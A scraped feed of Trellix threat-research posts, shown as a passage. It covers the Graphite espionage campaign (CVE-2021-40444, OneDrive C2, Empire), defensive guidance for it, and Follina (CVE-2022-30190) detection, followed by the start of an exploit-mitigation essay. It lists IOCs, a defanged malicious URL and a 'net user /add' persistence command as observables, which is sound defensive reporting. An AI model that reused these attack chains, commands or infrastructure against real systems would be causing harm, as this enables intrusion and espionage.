budgets in dollars for the military operations in some countries for the years 2022 and 2023.\n\n **Figure 22. Lure document targeting the defense sector**\n\nMoreover, from our telemetry we also have observed that Poland and other Eastern European countries were of interest to the actors behind this campaign.\n\nThe complete victimology of the actors is unknown, but the lure documents we have seen show its activities are centered in specific regions and industries. Based on the names, the content of the malicious Excel files and our telemetry, targeting countries in Western Asia and Eastern Europe and the most prevalent industries are Defense and Government.\n\n#### Infrastructure\n\nThanks to the analysis of the full attack chain, two hosts related to the attack were identified. The first domain is wordkeyvpload.net which resolves to the IP 131.153.96.114, located in Serbia and registered on the 7th of July 2021 with OwnRegistrar Inc. \n\nQuerying the IP with a reverse DNS lookup tool, a PTR record was obtained resolving to the domain \u201cbwh7196.bitcoinwebhosting.net\u201d which could be an indication that the server was bought from the Bitcoin Web Hosting VPS reseller company.\n\n **Figure 23. Reverse DNS query**\n\nThe main functionality of this command-and-control server is to host the HTML exploit for CVE-2021-40444 and the CAB file containing the second stage DLL.\n\nThe second domain identified is wordkeyvpload.org which resolves to the IP 185.117.88.19, located in Sweden, and registered on the 18th of June 2021 with Namecheap Inc. Based on the operating system (Microsoft Windows Server 2008 R2), the HTTP server (Microsoft-IIS/7.5) and the open ports (1337 and 5000) it is very likely the host is running the latest version of the Empire post-exploitation framework.\n\nThe reason behind that hypothesis is that the default configuration of Empire servers uses port 1337 to host a RESTful API and port 5000 hosts a SocketIO interface to interact remotely with the server. Also, when deploying a HTTP Listener, the default value for the HTTP Server field is hardcoded to \u201cMicrosoft-IIS/7.5\u201d.\n\n **Figure 24. Local Empire server execution with default configuration**\n\nWith the aforementioned information, as well as the extraction of the command and control from the last stage of the malware, we can confirm that this host acts as an Empire server used to remotely control the agents installed in victims\u2019 machines and send commands to execute them.\n\n#### Attribution\n\nDuring the timeline of this operation there have been some political tensions around the Armenian and Azerbaijani border. Therefore, from a classic intelligence operation point of view, it would make complete sense to infiltrate and gather information to assess the risk and movements of the different parties involved. \n\nThroughout our research into the Graphite campaign, we extracted all timestamps of activity from the attackers from our telemetry and found two consistent trends. First, the activity days of the adversary are from Monday to Friday, as depicted in the image below:\n\n **Figure 25. Adversary\u2019s working days**\n\nSecond, the activity timestamps correspond to normal business hours (from 08h to 18h) in the GMT+3 time zone, which includes Moscow Time, Turkey Time, Arabia Standard Time and East Africa Time.\n\n **Figure 26. Adversary\u2019s working hours**\n\nAnother interesting discovery during the investigation was that the attackers were using the CLSID (D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D) for persistence, which matched with an ESET report in which researchers mentioned a Russian Operation targeting Eastern European countries.\n\nAnalyzing and comparing code-blocks and sequences from the graphite malware with our database of samples, we discovered overlap with samples in 2018 being attributed to APT28. We compared for example our samples towards this one: 5bb9f53636efafdd30023d44be1be55bf7c7b7d5 (sha1):\n\n **Figure 27 Code comparison of samples**\n\nWhen we zoom in on some of the functions, we observe on the left side of the below picture the graphite sample and on the right the forementioned 2018 sample. With almost three years in time difference, it makes sense that code is changed, but still it looks like the programmer was happy with some of the previous functions:\n\n **Figure 28 Similar function flow**\n\nAlthough we mentioned some tactics, techniques and procedures (TTPs) of the actors behind this campaign, we simply do not have enough context, similarities or overlap to point us with low/moderate confidence towards APT28, let alone a nation-state sponsor. However, we believe we are dealing with a skilled actor based on how the infrastructure, malware coding and operation was setup. \n\n#### Conclusion\n\nThe analysis of the campaign described in this blog post allowed us to gather insights into a multi-staged attack performed in early October, leveraging the MSHTML remote code execution vulnerability (CVE-2021-40444) to target countries in Eastern Europe. \n\nAs seen in the analysis of the Graphite malware, one quite innovative functionality is the use of the OneDrive service as a Command and Control through querying the Microsoft Graph API with a hardcoded token in the malware. This type of communication allows the malware to go unnoticed in the victims\u2019 systems since it will only connect to legitimate Microsoft domains and won\u2019t show any suspicious network traffic.\n\nThanks to the analysis of the full attack process, we were able to identify new infrastructure acting as command and control from the actors and the final payload, which is an agent from the post-exploitation framework Empire. All the above allowed us to construct a timeline of the activity observed in the campaign.\n\nThe actors behind the attack seem very advanced based on the targeting, the malware and the infrastructure used in the operation, so we presume that the main goal of this campaign is espionage. With a low and moderate confidence, we believe this operation was executed by APT28. To further investigate, we provided some tactics, techniques and procedures (TTPs), indicators on the infrastructure, targeting and capabilities to detect this campaign.\n\n#### MITRE ATT&CK Techniques\n\nTactic | Technique ID | Technique Title | Observable | IOCs \n---|---|---|---|--- \nResource Development | T1583.001 | Acquire Infrastructure: Domains | Attackers purchased domains to be used as a command and control. | wordkeyvpload[.]net \nwordkeyvpload[.]org \nResource Development | T1587.001 | Develop capabilities: Malware | Attackers built malicious components to conduct their attack. | Graphite malware \nResource Development | T1588.002 | Develop capabilities: Tool | Attackers employed red teaming tools to conduct their attack. | Empire \nInitial Access | T1566.001 | Phishing: Spear phishing Attachment | Adversaries sent spear phishing emails with a malicious attachment to gain access to victim systems. | BM-D(2021)0247.xlsx \nExecution | T1203 | Exploitation for Client Execution | Adversaries exploited a vulnerability in Microsoft Office to execute code. | CVE-2021-40444 \nExecution | T1059.001 | Command and Scripting Interpreter: PowerShell | Adversaries abused PowerShell for execution of the Empire stager. | Empire Powershell stager \nPersistence | T1546.015 | Event Triggered Execution: Component Object Model Hijacking | Adversaries established persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. | CLSID: D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D \nPersistence | T1136.001 | Create Account: Local Account | Adversaries created a local account to maintain access to victim systems. | net user /add user1 \nDefense Evasion | T1620 | Reflective Code Loading | Adversaries reflectively loaded code into a process to conceal the execution of malicious payloads. | Empire DLL Launcher stager \nCommand and Control | T1104 | Multi-Stage Channels | Adversaries created multiple stages to obfuscate the command-and-control channel and to make detection more difficult. | Use of different Empire stagers \nCommand and Control | T1102.002 | Web Service: Bidirectional Communication | Adversaries used an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. | Microsoft OneDrive \nEmpire Server \nCommand and Control | T1573.001 | Encrypted Channel: Symmetric Cryptography | Adversaries employed a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. | AES 256 \nCommand and Control | T1573.002 | Encrypted Channel: Asymmetric Cryptography | Adversaries employed a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. | RSA \n \n#### Indicators of Compromise (IOCs)\n\n##### First stage \u2013 Excel Downloaders\n\n40d56f10a54bd8031191638e7df74753315e76f198192b6e3965d182136fc2fa \nf007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4 \n7bd11553409d635fe8ad72c5d1c56f77b6be55f1ace4f77f42f6bfb4408f4b3a \n9052568af4c2e9935c837c9bdcffc79183862df083b58aae167a480bd3892ad0 \n\n\n##### Second stage \u2013 Downloader DLL\n\n1ee602e9b6e4e58dfff0fb8606a41336723169f8d6b4b1b433372bf6573baf40 \n\n\n##### Third stage \u2013 Graphite\n\n35f2a4d11264e7729eaf7a7e002de0799d0981057187793c0ba93f636126135f \nf229a8eb6f5285a1762677c38175c71dead77768f6f5a6ebc320679068293231 \n\n\n##### Fourth stage \u2013 DLL Launcher Stager\n\n25765faedcfee59ce3f5eb3540d70f99f124af4942f24f0666c1374b01b24bd9 \n\n\n##### Fifth stage \u2013 PowerShell C# Stager\n\nd5c81423a856e68ad5edaf410c5dfed783a0ea4770dbc8fb4943406c316a4317 \n\n\n##### Sixth stage \u2013 Empire HTTP Powershell Stager\n\nda5a03bd74a271e4c5ef75ccdd065afe9bd1af749dbcff36ec7ce58bf7a7db37 \n\n\n##### URLs\n\nhxxps://wordkeyvpload[.]net/keys/Missions Budget Lb.xls \nhxxps://wordkeyvpload[.]net/keys/parliament_rew.xls \nhxxps://wordkeyvpload[.]net/keys/Missions Budget.xls \nhxxps://wordkeyvpload[.]net/keys/TR_comparison.xls \n\n\nhxxps://wordkeyvpload[.]net/keys/JjnJq3.html \nhxxps://wordkeyvpload[.]net/keys/iz7hfD.html \nhxxps://wordkeyvpload[.]net/keys/Ari2Rc.html \nhxxps://wordkeyvpload[.]net/keys/OD4cNq.html \n\n\nhxxps://wordkeyvpload[.]net/keys/0YOL4.cab \nhxxps://wordkeyvpload[.]net/keys/whmel.cab \nhxxps://wordkeyvpload[.]net/keys/UdOpQ.cab \nhxxps://wordkeyvpload[.]net/keys/D9V5E.cab \n\n\nhxxps://wordkeyvpload[.]net/keys/update.dat \n\n\nhxxps://wordkeyvpload[.]org/index.jsp \nhxxps://wordkeyvpload[.]org/index.php \nhxxps://wordkeyvpload[.]org/news.php \nhxxps://wordkeyvpload[.]org/admin/get.php \nhxxps://wordkeyvpload[.]org/login/process.php \n\n\n##### Domains\n\nwordkeyvpload[.]net \nwordkeyvpload[.]org \njimbeam[.]live \n\n\n##### IPs\n\n131.153.96[.]114 \n185.117.88[.]19 \n94.140.112[.]178 \n\n", "cvss3": {}, "published": "2022-01-25T00:00:00", "type": "trellix", "title": "Prime Minister\u2019s Office Compromised: Details of Recent Espionage Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-25T00:00:00", "id": "TRELLIX:6949BCDE9887B6759BD81365E21DD71C", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/prime-ministers-office-compromised.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-20T00:00:00", "description": "\n\n# Trellix Global Defenders: Defending against Cyber Espionage Campaigns \u2013 Operation Graphite\n\nBy Ben Marandel, **Arnab Roy** \u00b7 June 20, 2022\n\nCyber Espionage campaigns by nature are targeted attacks that can go undetected for prolonged periods of time. Cyber Espionage campaigns often involve adversaries with clear objectives with capabilities to avoid defenses and leverage trusted enterprise IT systems or operational weaknesses within organisations. Some of the key targets for espionage campaigns are as follows:\n\n Figure 1: Cyber Espionage Key Targets \n\n\nThe ultimate goal of most cyber espionage campaigns are data exfiltration and wide spread reconasaince.\n\n## Operation graphite introduction \n\nTrellix Advanced Threat Research team released threat research on the 25th of January 2022 which highlighted discovery of a new espionage campaign targeting high-ranking government officials Western Asia and Eastern Europe. The attack is believed to have been triggered via targeted phishing with malicious macro enabled word document used to establish the initial access. Once executed the malicious document leveraged a vulnerability in Excel (CVE2021-40444) which allows remote code execution on the impacted endpoint. Similar to other espionage campaigns their was hands on recon of the targeted organization, specifically looking for documents with specific keywords of interest. This was followed by multi-stage attack which included lateral movement to other systems of interest such as domain controllers and file servers. The following figure shows the attack progression:\n\n Figure 2: Attack Chain \n\n\nLike most multi-stage attacks a combination of exploitation techniques are observed such as use of LolBas/LolBins like Powershell and exploitation of enterprise architecture and system vulnerabilities.\n\nDuring our analysis of the overall flow of the attack and the related payloads the following attributes of the attack stood out that could be critical at detecting/preventing this threat:\n\n 1. Use of OneDrive as a command a control server as well as for storing payload configuration and staging. Their is evidence that the OneDrive Implant module of the empire framework was used by the threat actor which has been documented by the [empire framework maintainers](<https://www.bc-security.org/post/using-the-onedrive-listener-in-empire-3-1-3/>). This was used specifically to subvert network security controls and hide traffic inside legitimate applications. \n 2. Use of embedded XLS into XLSX to bypass macro execution protection added in Office Excel. The XLS file is used as a secondary payload which is exploiting the CVE-2021-40444, this is not the first file to be open by the victim. To maximize the chances of execution of the exploitable XLS document the attacker uses dynamic loading of the office ribbon and custom options in the office toolbar by using a XLSM file, this XLSM file then dynamically loads the XLS file which triggers the execution of CVE-2021-40444.\n\nBased on the observed TTP\u2019s and operational similarity Trellix Threat research team was moderately confident that this attack could be attributed to APT 28.\n\n## Defensive architecture guidance\n\nThe question is how do we protect ourselves from such attacks? At the heart of the answer is building an effective threat model for cyber espionage campaigns and then driving your defensive strategy based on \u201cthink red - act blue mindset\u201d where the threat informed layered defensive strategy drives how the security controls are configured to provide a resilient defensive architecture. Below is how the Trellix XDR solution architecture protects and detects this attack.\n\n Figure 3: Trellix Solution Architecture \n\n\nOrganizations can build an effective threat model based on adversary characteristics some of which is very well documented within the MITRE ATT&CK framework. Leveraging tools like MITRE ATT&CK navigator is one of the methods where you can combine multiple threat actor TTP\u2019s and create an effective threat model for your SOC, an example below for TTP\u2019s used by APT 28:\n\n**Common techniques used for Cyber Espionage - using ATT&CK**\n\n Figure 4: MITRE ATT&CK Navigator for APT28 \n\n\nHowever, for customers who have Trellix Insights this process is even simpler: By filtering the Profiles to APT28, you will get a complete overview of the APT28 Group activities. As an introduction the tool will give you a short description of the group and their current targeted countries / sectors. \n\n Figure 5: APT28 Group Overview from MVISION Insights \n\n\nJust after this introduction, you will get overview of the 42+ campaign currently observed by the Trellix Labs. This view also indicates which endpoints within your organization may have insufficient coverage to protect themselves. By clicking on the name of the campaign, you will pivot to the full details of the selected campaign.\n\n Figure 6: Examples of APT28 related campaigns from MVISION Insights \n\n\nThe third section of the interface, describes the MITRE Techniques of Tools used by APT28 group. Once C2 communications is established, researchers established the use of \u201cFiles and Directory Discovery \u2013 T1083\u201d technique for Discovery and \u201cData Transfer Size Limits \u2013 T1030\u201d technique for Exfiltration.\n\nThis group also uses tools such as Mimikatz to simplify Credential Access via LSASS Memory \u2013 T1003.001, Certutil to download third-party tools or X-Tunnel for Exfiltration over Asymmetric Encrypted Non-C2 Protocols \u2013 T1048.002. \n\n Figure 7: MITRE Techniques used by the APT28 Group from MVISION Insights \n\n\nAnd finally, based on all those information, the interface builds for you the powerful ATT&CK Matrix with a clear representation of the observed techniques.\n\n Figure 8: APT28 Group MITRE ATT&CK matrix from MVISION Insights \n\n\n**Endpoint Protection Actions:** Trellix Endpoint uses exploit prevention to block execution of CVE-2021-40444 as well as use behavioral threat protection via Adaptive Threat Prevention module. Specifically, Advanced Behavior Blocking (ABB) rules stop the execution of child processes from office processes thus breaking the kill chain early in the attack lifecycle. The following rules in Trellix ENS Exploit Prevention and Adaptive Threat Protection (ATP) are recommended to observe or block behavioral activity associated with exploitation techniques.\n\n**ENS Exploit Prevention Signature 6163:** T1055: Suspicious Behavior: Malicious Shell Injection Detected\n\n**ENS Exploit Prevention Signature 6115:** T1055: Fileless Threat: Reflective DLL Remote Injection\n\n**ENS ATP Rule 300:** T1566: Prevent office applications from launching child processes that can execute script commands \n\nTo complement protection capabilities, Trellix EDR solution detects and visualizes the attack chain, as illustrated bellow at the \u201cInitial Access\u201d when the victim is opening for the first time the specifically crafted XLSX file.\n\nIn this screenshot of a demo sample illustrating Office Excel, you can observe the download of the XLS file natively through an HTTPS connection, after it has opened the XLSX file.\n\n Figure 9: Excel.exe opening an XLSX file and then downloading an XLS file, captured by MVISION EDR \n\n\n**Preventing Data Exfiltration:** Preventing the attempts to exfiltrate data can defeat this type of attack at an early stage. The threat actor uses two key techniques for data exfiltration: exfiltration over existing network protocols and endpoint data reconnaissance techniques. The exfiltration over the existing network protocol leverages the Microsoft Graph API utilized by O365 suite of apps to communicate between various O365 services. The graph API has been a target of previous APT campaigns as it provides a unique insight into existing enterprise data sitting inside O365. One of the key ways this attack can be completely defeated is by ensuring users cannot login to non-sanctioned O365 tenants. This is possible by leveraging a URL content proxy that inspects the O365 instance id in the login URL of the tenant and subsequent communication. The proxy can be configured to only allow the organizational tenant id of the enterprise O365 instance and not that of other O365 tenants. This will prevent the threat actor from succeeding in establishing the initial command and control connection as well as data exfiltration. Deploying endpoint DLP is the second critical factor in preventing the data exfiltration of sensitive information leaving organizational perimeter. This includes getting visibility into endpoint processes accessing sensitive/tagged data.\n\n**Bringing Visibility into the SOC with XDR:** Detecting multi-vector telemetry requires context and correlation across multiple data sources so that the right alerts and telemetry is presented to the SOC analyst for effective triage, scoping of the threat and effective incident response.\n\n Figure 10: Example XDR Correlation with multi-vector sensor telemetry from Threat Intelligence, Endpoint, DLP \n\n\n**Integrated sandbox for malware analysis:** As part of the Trellix solution architecture, the endpoints are capable of sending files dynamically or through integrated SOAR workflows to the Trellix Detection on Demand Cloud Sandbox. A quick analysis of the XLSX document reveals that pseudo data was used entice the end user into opening the document.\n\n Figure 11: Trellix DOD Analysis \n\n\n## Summary\n\nDefeating a multi-stage cyberespionage campaign requires a multipronged defensive strategy that starts by building an effective threat model leading to prioritization and deployment of highest impact preventive controls which leads to a security model that stalls the attackers progress and delivering enterprise resilience to cyberespionage campaigns. Some of the key steps in building such resilience is as follows:\n\n Figure 12: Cyber Espionage Playbook \n\n\nFor additional details and understanding, you can view our Threat Center webinar with Trellix Solution Architects explaining how we defend against this attack [here](<https://www.mcafee.com/enterprise/en-us/forms/gated-form.html?docID=video-6305609522112&eid=P5SWSAQK>).\n", "cvss3": {}, "published": "2022-06-20T00:00:00", "type": "trellix", "title": "Trellix Global Defenders: Defending against Cyber Espionage Campaigns \u2013 Operation Graphite", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2022-06-20T00:00:00", "id": "TRELLIX:0BACBA94111E0C364A9A1CCD8BD263DE", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/defending-against-cyber-espionage-campaigns-operation-graphite.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-19T00:00:00", "description": "# Countering Follina Attack (CVE- 2022-30190) with Trellix Network Security Platform\u2019s Advanced Detection Features\n\nBy Vinay Kumar and Chintan Shah \u00b7 July 19, 2022\n\n## Executive summary\n\nDuring the end of May 2022, independent security researcher reported a vulnerability (assigned CVE-2022-30190) in Microsoft Support Diagnostic Tool (MSDT), which could be exploited to execute arbitrary code when MSDT is called using URI protocol. The URI protocol **ms-msdt:/** could also be invoked from the malicious word document, which when opened by the victim, would allow malicious code to execute on the target machine with the privileges of the calling application. In response to the reported vulnerability, Microsoft released [the advisory and guidance](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on disabling the MSDT URI protocol. Subsequently, the vulnerability, was patched in the [June security updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) released by Microsoft. Since then, this vulnerability has been found to be exploited by multiple state actors in [targeted attack campaigns](<https://www.bleepingcomputer.com/news/security/windows-msdt-zero-day-now-exploited-by-chinese-apt-hackers/>).\n\nAt Trellix, we are committed to protecting our customers from upcoming and emerging threats on the network inclusive of those that are found being exploited in the wild. Trellix Network Security Platform\u2019s (Trellix NSP) Intrusion Prevention Research Team strives to build advanced detection features , improving product\u2019s overall Threat Detection capabilities.\n\nOver the next few sections of this blog, we will highlight couple of advanced detection features in Trellix NSP, which helps in protecting the customers against this and future attacks of similar nature.\n\n## Introduction \n\nMS Word document exploiting Microsoft Support Diagnostic Tool vulnerability ( CVE- 2022-30190 ) was first found to be [submitted to VT](<https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/>) on 27th May 2022 from Belarus with the file name **05-2022-0438.doc**. However, the number 0438 turns out to be the Area code of the region **Follina** in Italy and hence the name. Exploit document is not found to be connected to Italy in any way.\n\n Figure 1: Sample submission history on VirusTotal \n\n\nThere is no dearth of instances where one of the MS Office\u2019s core features, Object Linking and Embedding ( OLE ) have been abused as an initial attack vector and CVE-2022-30190 was no different. This was yet another classic example of chaining OLE with another logic flaw to achieve arbitrary code execution on the target machine. Traditionally, Object Linking and Embedding had significantly contributed to building weaponized office exploits, and we believe this will continue to happen. As with previous CVE-2021-40444 and many other exploits, OLE was found to be used for linking the document to the externally hosted object, in this case, html file. \n\n[MS Office Open XML specifications](<https://www.ecma-international.org/publications-and-standards/standards/ecma-376/>) mentions that an Office Open XML document facilitates embedding objects or link to external objects which can be specified via relationships. Any embedded or linked object specified in the container application ( OOXML document in this case ) must be identified by its unique **ProgID** string. As per the specifications, this string must be used to determine the type and the application used to load the object data. An excerpt from the document specifications is as shown below:\n\n Figure 2: Specs on Embedded objects \n\n\nAs documented in the [ISO-29500-4 specifications](<https://standards.iso.org/ittf/PubliclyAvailableStandards/c071692_ISO_IEC_29500-4_2016.zip>) ST_OLEType defines the type of the OLE object in **document.xml**, either linked or embedded and the **ProgID=\u201dhtmlfile\u201d** indicates the type of linked object data. As shown in the CVE-2022-30190 exploit document below, **document.xml.rels** file with Type attribute specifying relationship as \u201coleObject\u201d, **Target** attribute set to the OLE object link and **TargetMode** set as external. This allows the crafted document to link to the externally hosted potentially malicious object and invoke the respective protocol handlers for rendering the object which could lead to the exploitation of potential logic flaws in object renderers.\n\n Figure 3: Structure of exploit document \n\n\nAs we notice the document.xml.rels file, it contains an external reference to the malicious domain for retrieving the html file :\n\n**hxxps://www.xmlformats.com/office/word/2022/wordprocessingDrawing/RDF842l.html!**. Hosted html file on this domain contains script block with commented lines. This is required for making the HTML file sufficiently sized ( precisely greater than 4KB ) to be able to get it processed and rendered by mshtml.dll. \n\n Figure 4: downloaded html file from server \n\n\nSubsequently, script tries to invoke PCWDiagnostic package using MSDT URI protocol handler with multiple arguments out of which one argument is IT_BrowseForFile which can take embedded PowerShell script within $( ) as an argument , resulting into code execution. PowerShell script is Base64 encoded and decoded form is of the script is as shown below. \n\n Figure 5: Decoded PowerShell script \n\n\nAs we see in the decoded payload, the script is intended to run the malicious rgb.exe on the target system. Summarizing the sequence involved in the attack:\n\n * Malicious MS office document with linked object is delivered to the victim possibly, as a part of phishing campaign.\n * On clicking the document, malicious HTML script is rendered, leading to arbitrary code execution on the affected system. \n\nWindows system registers innumerable number of URI protocol handlers which could be potentially abused to exploit similar flaws. For instance, [search-ms](<https://docs.microsoft.com/en-us/windows/win32/search/getting-started-with-parameter-value-arguments>) URI protocol handler , used to query windows search indexing feature can be abused by the attackers to connect to the remote SMB share on the attacker-controlled server. However, it does not directly lead to code execution as it requires multiple levels of user interaction, but a query can be crafted to lure the users to execute legitimate looking executables as shown below. Both these of URI protocol attacks were first [reported here](<https://benjamin-altpeter.de/shell-openexternal-dangers/>).\n\n Figure 6: search-ms query to connect to remote location \n\n\n**How Trellix NSP protects against Follina**\n\nTrellix NSP has been one of the most advance and mature IPS in the security industry. Over a period, we developed some of the cutting-edge features to deal with complex attack scenarios which involved handling encoding, compressions, and complex file formats. **Microsoft Office Deep File Inspection** and **Multi Attack ID Correlation** being some of these. We use combination of these advance capabilities to detect entire attack cycle. In the following sections, we will try to understand how Trellix Network Security Platform\u2019s advanced inspection capabilities highlighted above can help correlate multiple low or medium severity events to detect phases in the attack cycle, thereby raising overall confidence level.\n\n**Microsoft Open Office XML(OOXML) file format**\n\nOLE File format which was traditionally used in Microsoft office is replaced with Office open xml. Office Open XML (OOXML) is a zipped, XML-based file format developed by Microsoft for representing spreadsheets, charts, presentations, and word processing documents. In a nutshell this means that the whole document is contained in a zip package. Multiple files and directories together form the document. There are directories like _[Content_Types].xml , _rels, docProps_, which are basic part of all office zip packages, and then there is a directory specific to document type _(word directory for docx, xl and ppt directory for xlsx and pptx respectively)_. For each of the document type the specific directory would contain different files limited to the type. Like in case of a docx type, the \u2018word\u2019 directory contains document.xml file which has the core content of the document. Here is a brief overview about important files under these directories: \n\n**[Content_Types].xml** \nThis file contains the MIME type information for parts of the package. It uses defaults for certain file extensions and overrides for parts specified by Internationalized Resource Identifier.\n\n**_rels** \nThis directory contains the relationship information for files within the package.\n\n**_rels/.rels** \nThis is the location where applications look first to find the package relationships.\n\n**docProps/core.xml** \nThis file contains the core properties for any Office Open XML document.\n\n**word/document.xml** \nThis file is the main part for any Word document.\n\nZip file format specification specifies that a file in the zip archive is stored in a file record structure. For each file in the zip archive, there is a corresponding entry of this structure. \n\n[local file header 1] \n[file data 1] \n[data descriptor 1] \n. \n. \n. \n[local file header n] \n[file data n] \n[data descriptor n] \n \n[archive decryption header] \n[archive extra data record] \n[central directory header 1] \n. \n. \n. \n[central directory header n] \n[zip64 end of central directory record] \n[zip64 end of central directory locator] \n[end of central directory record]\n\nThese structures are placed one after another, structure starts with local file header followed by optional Extra Data Fields and file data (optionally compressed/optionally encrypted). Local header contains details about the file data, encryption/compression mechanism along with filename, file size and few more things.\n\n**Local file header**\n\nOffset | Byte | Description \n---|---|--- \n0 | 4 | Local file header signature # 0x04034b50 (read as a little-endian number) \n4 | 2 | Version needed to extract (minimum) \n6 | 2 | General purpose bit flag \n8 | 2 | Compression method \n10 | 2 | File last modification time \n12 | 2 | File last modification date \n14 | 4 | CRC-32 \n18 | 4 | Compressed size \n22 | 4 | Uncompressed size \n26 | 2 | File name length (n) \n28 | 2 | Extra field length (m) \n30 | n | File Name \n30+n | m | Extra Field \n0 | 4 | Local file header signature # 0x04034b50 (read as a little-endian number) \n4 | 2 | Version needed to extract (minimum) \n6 | 2 | General purpose bit flag \n \n \n\n\nFor Microsoft documents, deflate compression is used commonly. In a nutshell, the files which constitutes the document are stored in possibly encrypted/compressed format inside the zip package. In the figure below, we dissect this structure for document.xml file present under word directory with a hex editor (010 editor) with zip parsing capabilities which will help us to investigate the details \u2013\n\n Figure 7: Structure for document.xml \n\n\n**Need for deep file inspection**\n\nWe have seen in the past that different vulnerabilities may require the IPS devices to examine the content of the different files present inside zip package. Same is the case with Follina. As explained earlier, this vulnerability abuses Microsoft OOXML **Object Linking and Embedding** functionality linking a file to external resource via the relationship file to load malicious content. Hence it requires the detection device to check the external references used in word/rels/document.xml.rels file. \n\n Figure 8: Structure of document.xml.rels \n\n\nSince this file is present, as a compressed entity in the zip archive, a meaningful detection with IPS cannot be done until the file is decompressed. With NSP\u2019s unique in industry capability, known as Deep File inspection, this is possible. \n\nThis is implemented using protocol parsing capability of the NSP. The local file header structure for the specific file is parsed and the compressed data of the file is decoded. This feature can be used by enabling it from the inspection option policy.\n\n Figure 9: Policy configuration to enable MS Office Deep File Inspection \n\n\n_For more details, please refer to NSP documentation_\n\n**Some of the key highlights: deep file inspection **\n\n * This feature helps to decompress the file contents inline; the complete file is not required to be downloaded for inspection \n * It also gives the flexibility to decompress only the content of a selected file (individual file present inside zip achieve), yielding better performance since the whole zip archive is not required to be decompressed .\n * The individual files (which are part of zip package) can be controllably decompressed by specifying byte limit per file. This plays a great role in improving performance while doing inline inspection.\n\nTrellix NSP Attack ID **0x452a8400 - HTTP: OLE Object Linking Detected in OOXML File** \u2013 uses the Microsoft Office Deep file inspection feature to detect signs of external object linking. However, just checking for external OLE references will not be sufficient until it is ascertained that the external URI does the malicious activity. Since we know that external URI loads the HTML which invokes the MSDT handler in a malicious fashion. \n\nInvoking MSDT through HTML content is detected by Trellix NSP Attack ID **0x452ac200 \u2013 HTTP: Microsoft Support Diagnostic Tool Remote Code Execution Vulnerability (CVE-2022-30190)**\n\n**Detecting the attack chain using multi attack ID Correlation**\n\nThe attack visualization is better when the dots can be connected between different stages of the attack. Multi Attack ID Correlation capability helps achieve this by correlating multiple attacks. \n\nTrellix NSP Attack ID **0x43f02000 HTTP: Microsoft Support Diagnostic Tool RCE Vulnerability (CVE-2022-30190)** utilizes this capability and correlates \u201cHTTP: OLE Object Linking Detected in OOXML File (0x452a8400) \u201d and \u201cHTTP: Microsoft Support Diagnostic Tool Remote Code Execution Vulnerability (CVE-2022-30190) (0x452ac200)\u201d to generate corelated attack event. \n\nThe alert generated using Multi AID correlation is of high confidence and severity and helps security admins to take further actions. This feature is built into Trellix NSP by default and there is no extra configuration required to enable it. \n\n**Some of the key highlights: multi attack ID Correlation **\n\n * Two or more attacks can be correlated \n * Provides capability to quarantine the attacker (configurable from the policy)\n * Correlation using attributes like \u2013 \n * source-IP/destination IP: This attribute helps correlating attack originating from same source IP and/or targeted to the same destination IP .\n * Lifetime: max time interval in which all correlation signature event should occur\n * Threshold: Detection of attack happening repeatedly in a specific period.\n\nWith these strong correlation capabilities for the complete attack cycle, Trellix Network Security Platform\u2019s Threat Detection solution balances the effectiveness and performance extremely well. The Trellix NSP research and Engineering team actively monitors and keeps an eye on emerging threat patterns ,builds the features and capabilities to enhance overall detection efficacy of the Intrusion Prevention System. \n\n## Conclusion \n\nWe have seen multiple vulnerabilities in the past using exploitation techniques similar in nature and this is yet another addition to the series. In our previous blog, outlining the current state of memory corruption vulnerabilities and the challenges faced in exploiting them, we also highlighted the exploitation strategies of the future and the **Follina** attack very well validates our prediction. While exploiting different classes of memory corruption vulnerabilities can be eliminated by introducing mitigations as either operating system or hardware level, vulnerabilities exploiting design flaws will remain a challenge. Perimeter and endpoint security solutions will have to evolve to address those challenges by introducing the innovative inspection and detection techniques alongside applying secure software design and development practices during application development. \n", "cvss3": {}, "published": "2022-07-19T00:00:00", "type": "trellix", "title": "Countering Follina Attack (CVE- 2022-30190) with Trellix Network Security Platform\u2019s Advanced Detection Features", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444", "CVE-2022-30190"], "modified": "2022-07-19T00:00:00", "id": "TRELLIX:D8DB23FAEBC16DCFBC54050BEBBF650D", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/countering-follina-attack-with-network-security-platforms-advanced-detection-features.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-01-24T00:00:00", "description": "# Beyond Memory Corruption Vulnerabilities \u2013 A Security Extinction and Future of Exploitation\n\nBy Chintan Shah \u00b7 January 24, 2022\n\nModern exploitation techniques have changed how adversaries execute their attack strategies and how defenders analyze paths from vulnerability to exploitation. Over the past decade, we have seen rock solid focus on hardening security at both the overall Operating System and applications, which has resulted in remarkable progress being made on introducing several exploit mitigations. This progress has been gradually eliminating entire classes of memory corruption vulnerabilities in some cases. The Use-after-free (UAF) is a class of vulnerabilities, for example, which is very common in large complex code bases such as web browsers. Due to ease of exploitation, Microsoft introduced an isolated heap and delayed free of objects in its browser engine (mshtml.dll), breaking the UAF exploitation chain and making adversaries to address those barriers requiring them to re-engineer the exploits. Figure 1 below shows the part of the code where it was introduced to mitigate UAF vulnerabilities. \n\n **Figure 1 \u2013 mshtml introduction of the isolated heap to raise exploitation bar for UAF exploitation**\n\nWe can notice the 